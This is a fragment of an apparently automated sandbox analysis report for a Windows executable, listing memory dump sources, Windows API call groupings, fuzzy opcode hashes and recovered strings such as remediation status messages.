                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$FillInflate
                                                                            • String ID:
                                                                            • API String ID: 3595577067-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageRectSend$EmptyWindow
                                                                            • String ID:
                                                                            • API String ID: 1914275016-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Message$BeepExceptionInvalidateMenuRectSendThrow
                                                                            • String ID:
                                                                            • API String ID: 2854889734-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Menu$AppendCheckCreateItemPopupWindow
                                                                            • String ID:
                                                                            • API String ID: 2012662573-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Menu$Delete$EnableImageInvalidateItemKillLoadObjectRectSystemTimerUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 4017357474-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$ConditionMaskOffset$ColorFillInfoMetricsSystemTextVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 1863428763-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                            • String ID:
                                                                            • API String ID: 3936042273-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: CompatibleConditionCreateHashMask$BitmapClientImplImpl::InfoMetricsRectSystemVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 2548309268-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ContextExternal$BaseBase::~Concurrency::details::DestroyMenuMessageParentSendWindow
                                                                            • String ID:
                                                                            • API String ID: 3377428259-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: EnableFocusItemMenuMessageParentSend
                                                                            • String ID:
                                                                            • API String ID: 2297321873-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 3204612718-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: EmptyRectRedrawWindow
                                                                            • String ID:
                                                                            • API String ID: 1437620686-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$DeferRect$BeginClient
                                                                            • String ID:
                                                                            • API String ID: 3800593763-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend$Windowstd::ios_base::~ios_base
                                                                            • String ID:
                                                                            • API String ID: 3123351323-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$ClientEmptyOffsetParent
                                                                            • String ID:
                                                                            • API String ID: 3819956977-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$GroupItemNext$EnabledLongParentRedraw
                                                                            • String ID:
                                                                            • API String ID: 2934814974-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Create$BitmapBrushPattern
                                                                            • String ID:
                                                                            • API String ID: 3280665104-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend$CaptureExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 4269541544-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Resource$FindFreeGlobalLoadLock
                                                                            • String ID:
                                                                            • API String ID: 3898064442-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateCreateDeactivateDebugDialogIndirectOutputParamString
                                                                            • String ID:
                                                                            • API String ID: 475891805-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$CallCursorHookNextWindow
                                                                            • String ID:
                                                                            • API String ID: 3719484595-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Child$FocusMessageSend
                                                                            • String ID:
                                                                            • API String ID: 287298614-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: BackgroundDrawRectTheme$EmptyInflate
                                                                            • String ID:
                                                                            • API String ID: 1053687596-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                            • String ID:
                                                                            • API String ID: 892977027-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateClassDeactivateDebugOutputRegisterString
                                                                            • String ID:
                                                                            • API String ID: 312599135-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ErrorLast$ActivateClassDeactivateDebugInfoOutputString
                                                                            • String ID:
                                                                            • API String ID: 2706167345-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: EmptyRect$ReleaseVisibleWindow
                                                                            • String ID:
                                                                            • API String ID: 617111112-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 951cd432f0cf610a23d8feaa701ec3c654529af0a2ccd26c535ed7e557443f75
                                                                            • Instruction ID: 5897577eb74bd5ee80fa1a39d3e8243519d405be718c142350519bd3cac89733
                                                                            • Opcode Fuzzy Hash: 951cd432f0cf610a23d8feaa701ec3c654529af0a2ccd26c535ed7e557443f75
                                                                            • Instruction Fuzzy Hash: 69F06DB2B0264606FC6F73A345563ED11824F5EBF0F904B68BB39027E6ED3C8CA20100
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MetricsSystem$ClientMessageRectSend
                                                                            • String ID:
                                                                            • API String ID: 2251314529-0
                                                                            • Opcode ID: d6d7634b4d2bc64a44b6a530b55dfe517b632838eab4eb278642de79a8a7290b
                                                                            • Instruction ID: 7cdf6c8174fb422e0a07346701d3826cd4e342db7c4075a00e12e0c854004ec8
                                                                            • Opcode Fuzzy Hash: d6d7634b4d2bc64a44b6a530b55dfe517b632838eab4eb278642de79a8a7290b
                                                                            • Instruction Fuzzy Hash: 1611D63331474483EB55CB36E4987AA6761FB8CB94F044221AB8D877A4DFBCC590CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: InvalidateRectUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 1236202516-0
                                                                            • Opcode ID: 6297357fb565d201053067b49fcce387b9f194763403fd76b5e01f2ec79161e8
                                                                            • Instruction ID: 721152671d7d099dee702780748e3a64f234c5c8fad994bc3beb61ee58a7be68
                                                                            • Opcode Fuzzy Hash: 6297357fb565d201053067b49fcce387b9f194763403fd76b5e01f2ec79161e8
                                                                            • Instruction Fuzzy Hash: 3901E572521640CAFB518F2AC44D7E93762E394F6EF580035CA090E5A4DFBB84AACB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AllocGlobal
                                                                            • String ID: g
                                                                            • API String ID: 3761449716-30677878
                                                                            • Opcode ID: 3b214a9e221339b24b06625db0ac36d0fed0d917df989e489a95a243a305f7bd
                                                                            • Instruction ID: 4754c4fbe73149b8a4bc0dfd33578db20ea1921c944be4e8c66bd9792b3b7af7
                                                                            • Opcode Fuzzy Hash: 3b214a9e221339b24b06625db0ac36d0fed0d917df989e489a95a243a305f7bd
                                                                            • Instruction Fuzzy Hash: 99817636214B8086EB11CFA6E8443DD63A1F788BE4F089126EF5D57BA9DE38C540CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ExtentPoint32Text
                                                                            • String ID:
                                                                            • API String ID: 223599850-1776720792
                                                                            • Opcode ID: ee4cc489368898e608386a95eae3c7f4bc69dae796da9b14e0f9633a3102189d
                                                                            • Instruction ID: e588983573ea3ba7b7717e96a40f28d0412b5d47479662161b8187eed76ebd11
                                                                            • Opcode Fuzzy Hash: ee4cc489368898e608386a95eae3c7f4bc69dae796da9b14e0f9633a3102189d
                                                                            • Instruction Fuzzy Hash: 31616076B106508AE714CFABD984BAD37B5F34CB88F05812ADF59A3B68DB34D841CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: InfoParametersRectSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 85510744-3916222277
                                                                            • Opcode ID: aeddfa0b7b7ad5ae32ebc6d9e9d2a403fce938b88ef03a40ba89ac803b2c0fc0
                                                                            • Instruction ID: fa3e27d82427e0765bd8b0491d173857be51677edbb322bff30dd1901066b573
                                                                            • Opcode Fuzzy Hash: aeddfa0b7b7ad5ae32ebc6d9e9d2a403fce938b88ef03a40ba89ac803b2c0fc0
                                                                            • Instruction Fuzzy Hash: 0E51B0B6B0069089EB16DBA7E4987EC37A5B79CF98F184025DF0A57BA5DF74C481CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Rect$EmptyInflate
                                                                            • String ID: $
                                                                            • API String ID: 2809357572-3993045852
                                                                            • Opcode ID: a76d352013c39924a9aa99cbbb18466f6eef7b9f438fdc6dba2cf355040b2300
                                                                            • Instruction ID: d9a8fb1fb2baaefd9fcb5955f6216a0289b8b700bc2a438a9b78e689f7a2e78e
                                                                            • Opcode Fuzzy Hash: a76d352013c39924a9aa99cbbb18466f6eef7b9f438fdc6dba2cf355040b2300
                                                                            • Instruction Fuzzy Hash: B8419B3631468582EA11EFABE9547AE7360F78DFC4F484126EF4A97B65DE78C401C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$failed
                                                                            • API String ID: 3341692771-3089831621
                                                                            • Opcode ID: 9c155582a06acc78169b66476d484f3ec0129cc3ea0c802e9b2bcc708287fe1b
                                                                            • Instruction ID: 423c179264a0ecf8a082c566edfe08755cf247106b4b41073c6bc3ee05fc6013
                                                                            • Opcode Fuzzy Hash: 9c155582a06acc78169b66476d484f3ec0129cc3ea0c802e9b2bcc708287fe1b
                                                                            • Instruction Fuzzy Hash: 7741F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$deleted
                                                                            • API String ID: 3341692771-3463592998
                                                                            • Opcode ID: 64f7e81a4bd859684b4fe9453c353bcde81c266cab922d3bcc1dd23d83d8f9c9
                                                                            • Instruction ID: a3467e48bfa044466a49f73c638a9d2a69217465896435770058cbd054f95cf2
                                                                            • Opcode Fuzzy Hash: 64f7e81a4bd859684b4fe9453c353bcde81c266cab922d3bcc1dd23d83d8f9c9
                                                                            • Instruction Fuzzy Hash: D541F772220A8096EB11EF36E8507DD2324F789BE8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$ignored
                                                                            • API String ID: 3341692771-4087165787
                                                                            • Opcode ID: d99785edc195997ddd09c7ad3e5f41bd8ead4e2d487e42c1d823f218471db799
                                                                            • Instruction ID: 6d75dbbdc5d9d9a355f58450bccbbc581fa7569f45dfb999c71cc36bff7ba728
                                                                            • Opcode Fuzzy Hash: d99785edc195997ddd09c7ad3e5f41bd8ead4e2d487e42c1d823f218471db799
                                                                            • Instruction Fuzzy Hash: BD41F772220A8096EB51EF36E8507DD2324F789BA8F805612FF5E97AE9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$quarantined
                                                                            • API String ID: 3341692771-4269031909
                                                                            • Opcode ID: 15f603d7c3c1300dba2e629123486a0d5d8b5e765606bf8fcbbfa0bb3e8725f3
                                                                            • Instruction ID: f1bf44f55d5b73bb4049c4b255d4f55bd801cef4cbe1f82414b55b50e309cc0d
                                                                            • Opcode Fuzzy Hash: 15f603d7c3c1300dba2e629123486a0d5d8b5e765606bf8fcbbfa0bb3e8725f3
                                                                            • Instruction Fuzzy Hash: 6F41F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$reportonly
                                                                            • API String ID: 3341692771-1437454803
                                                                            • Opcode ID: 1b9706d41bddfffa8b6be299cf9523416fe9a7202414131f9721e1b3db16a9f3
                                                                            • Instruction ID: 69370e95d4afdabca69a2a429675b89123bbbf2bdae1615990ad26fe133f8fdd
                                                                            • Opcode Fuzzy Hash: 1b9706d41bddfffa8b6be299cf9523416fe9a7202414131f9721e1b3db16a9f3
                                                                            • Instruction Fuzzy Hash: 0641F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$ignorealways
                                                                            • API String ID: 3341692771-623253409
                                                                            • Opcode ID: d5b257b082d482840a8c7d431b2f4d04db9976b30eb0ce12dd0e934ed85cc4d3
                                                                            • Instruction ID: b177a3712e17a1bc2e1cf31016a2fbb536159994969f4336b60cb4bf6f13f032
                                                                            • Opcode Fuzzy Hash: d5b257b082d482840a8c7d431b2f4d04db9976b30eb0ce12dd0e934ed85cc4d3
                                                                            • Instruction Fuzzy Hash: A141F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: Remediation: %s$cleaned
                                                                            • API String ID: 3341692771-3206119648
                                                                            • Opcode ID: c689a4940d5987144721a91bced242f68ab56f2156460ef2cab1a8c63ccb6a8c
                                                                            • Instruction ID: e0c5833f1891fa55e7fe1ff9dd8ff0c7a6775a61658ef99e0eb8e04631aa9a82
                                                                            • Opcode Fuzzy Hash: c689a4940d5987144721a91bced242f68ab56f2156460ef2cab1a8c63ccb6a8c
                                                                            • Instruction Fuzzy Hash: 0441F772220A8096EB11EF36E8507DD2324F789BA8F805612FF5E97AA9CF74C645C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0000000140049910: GetWindowDC.USER32(?,?,?,?,?,0000000140075E90), ref: 000000014004994F
                                                                            • GetWindowRect.USER32 ref: 00000001400882E2
                                                                              • Part of subcall function 000000014003A82C: GetWindowLongW.USER32 ref: 000000014003A849
                                                                            • InflateRect.USER32 ref: 0000000140088377
                                                                              • Part of subcall function 0000000140075108: VerSetConditionMask.KERNEL32 ref: 0000000140075163
                                                                              • Part of subcall function 0000000140075108: VerSetConditionMask.KERNEL32 ref: 0000000140075174
                                                                              • Part of subcall function 0000000140075108: VerifyVersionInfoW.KERNEL32 ref: 0000000140075187
                                                                              • Part of subcall function 0000000140075108: GetSystemMetrics.USER32 ref: 0000000140075198
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$ConditionMaskRect$InflateInfoLongMetricsSystemVerifyVersion
                                                                            • String ID: iii
                                                                            • API String ID: 2584581174-940974255
                                                                            • Opcode ID: c25988b43402036ca6170c72cacf7253d90af9ca652de3852f8d1ecd9b5f0eea
                                                                            • Instruction ID: b7a81dce4a814047c8ba9c47b80535a8816eee96211b42252883cbf6b30ba4b5
                                                                            • Opcode Fuzzy Hash: c25988b43402036ca6170c72cacf7253d90af9ca652de3852f8d1ecd9b5f0eea
                                                                            • Instruction Fuzzy Hash: F6313832F10A0099FB12DB66E8597EC3770B75C7A9F800219EF1867AF5DBB8C9858744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                            • String ID: false$false
                                                                            • API String ID: 3668304517-3709328725
                                                                            • Opcode ID: bdfd5e478f8d5c1e37b730327fc16c2f557cc4971eec6492818f541d607dca6e
                                                                            • Instruction ID: c6ce82619973a170121f3bc432a07b68539cb5986f40ce6ff65290f4b1526211
                                                                            • Opcode Fuzzy Hash: bdfd5e478f8d5c1e37b730327fc16c2f557cc4971eec6492818f541d607dca6e
                                                                            • Instruction Fuzzy Hash: 0E315C72228B4580FA13DB26F8997EA6760F78D3A4F900611E79D036F5EF78C545C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                            • String ID: true$true
                                                                            • API String ID: 3668304517-2879613866
                                                                            • Opcode ID: 23f64d0e50f501fbe73214a1fd7889908ac85007caa76620ab75920969cf0976
                                                                            • Instruction ID: febe12413654d29f01812ed7d4bff5e631bf879b6688f919646e0280be1b7b67
                                                                            • Opcode Fuzzy Hash: 23f64d0e50f501fbe73214a1fd7889908ac85007caa76620ab75920969cf0976
                                                                            • Instruction Fuzzy Hash: D7317C72225B4480FA22EB16F8997DA2360A78D3E4F900612E79D436F5EF7CC285C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: PropertyList
                                                                            • API String ID: 2525500382-1939653111
                                                                            • Opcode ID: 37385cecaab63a90d064f619d50396618d26a2f2e13a66f0ce477c6e8471a613
                                                                            • Instruction ID: d3e8e5d3784c24b11f00461443bf69e5de1259fa76df658bc52d89c665f66652
                                                                            • Opcode Fuzzy Hash: 37385cecaab63a90d064f619d50396618d26a2f2e13a66f0ce477c6e8471a613
                                                                            • Instruction Fuzzy Hash: A721A17621568081EA12CF17E8147BDA361F349BE0F248A12EB9D473E8DF79C491C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Stringtry_get_function
                                                                            • String ID: LCMapStringEx
                                                                            • API String ID: 2588686239-3893581201
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _handle_error
                                                                            • String ID: !$sqrt
                                                                            • API String ID: 1757819995-799759792
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ConditionInflateMaskRect$InfoMetricsSystemVerifyVersion
                                                                            • String ID: iii
                                                                            • API String ID: 1664059064-940974255
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FlushFileBuffers.KERNEL32(?,?,?,00000001401F47C7,?,?,?,?,?,?,00000001401E41EF,?,?,?,00000001401E40BD), ref: 00000001401F4712
                                                                            • GetLastError.KERNEL32(?,?,?,00000001401F47C7,?,?,?,?,?,?,00000001401E41EF,?,?,?,00000001401E40BD), ref: 00000001401F4726
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffersErrorFileFlushLast
                                                                            • String ID: pPE
                                                                            • API String ID: 1917127615-398285065
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: DefaultUsertry_get_function
                                                                            • String ID: GetUserDefaultLocaleName
                                                                            • API String ID: 3217810228-151340334
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • try_get_function.LIBVCRUNTIME ref: 00000001401F0145
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00456068,00000001401F2796,?,?,?,00000001401F268E,?,?,?,00000001401E3E6E), ref: 00000001401F015F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                            • String ID: InitializeCriticalSectionEx
                                                                            • API String ID: 539475747-3084827643
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: DownlevelLocaleName__crttry_get_function
                                                                            • String ID: LocaleNameToLCID
                                                                            • API String ID: 404522899-2050040251
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%